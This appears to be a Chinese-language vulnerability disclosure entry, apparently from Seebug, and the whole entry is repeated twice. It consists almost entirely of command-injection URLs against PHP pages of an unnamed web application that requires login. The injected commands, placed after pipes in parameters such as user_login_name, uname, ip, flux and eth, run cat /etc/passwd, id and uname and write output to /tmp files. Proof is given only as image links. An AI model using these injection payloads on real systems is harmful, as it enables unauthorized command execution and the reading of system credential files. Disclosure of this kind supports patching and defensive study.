VULHUB ™

### 简要描述： 需登录 ### 详细说明： http://target.com:8081/mem_user.php?action=search&user_login_name=|cat%20/etc/passwd http://target.com:8081/log.php?uname=1|cat%20/etc/passwd%20%3E/tmp/12.txt http://target.com:8081/online_user.php?uname=|cat%20/etc/passwd http://target.com:8081/online_user.php?ip=|uname http://target.com:8081/online_user.php?flux=|id http://target.com:8081/online_user_rad.php?flux=|id http://target.com:8081/show_flux.php?eth=|id%20%3E%20/tmp/22.txt ### 漏洞证明： 示例： [<img src="https://images.seebug.org/upload/201404/021326445032dbdf59a32667710ceb58d3f6ac8d.jpg" alt="exec2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/021326445032dbdf59a32667710ceb58d3f6ac8d.jpg) [<img src="https://images.seebug.org/upload/201404/02132755e3875c9c49291ef4a11af363099058d3.jpg" alt="exec3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02132755e3875c9c49291ef4a11af363099058d3.jpg)

### 简要描述： 需登录 ### 详细说明： http://target.com:8081/mem_user.php?action=search&user_login_name=|cat%20/etc/passwd http://target.com:8081/log.php?uname=1|cat%20/etc/passwd%20%3E/tmp/12.txt http://target.com:8081/online_user.php?uname=|cat%20/etc/passwd http://target.com:8081/online_user.php?ip=|uname http://target.com:8081/online_user.php?flux=|id http://target.com:8081/online_user_rad.php?flux=|id http://target.com:8081/show_flux.php?eth=|id%20%3E%20/tmp/22.txt ### 漏洞证明： 示例： [<img src="https://images.seebug.org/upload/201404/021326445032dbdf59a32667710ceb58d3f6ac8d.jpg" alt="exec2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/021326445032dbdf59a32667710ceb58d3f6ac8d.jpg) [<img src="https://images.seebug.org/upload/201404/02132755e3875c9c49291ef4a11af363099058d3.jpg" alt="exec3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02132755e3875c9c49291ef4a11af363099058d3.jpg)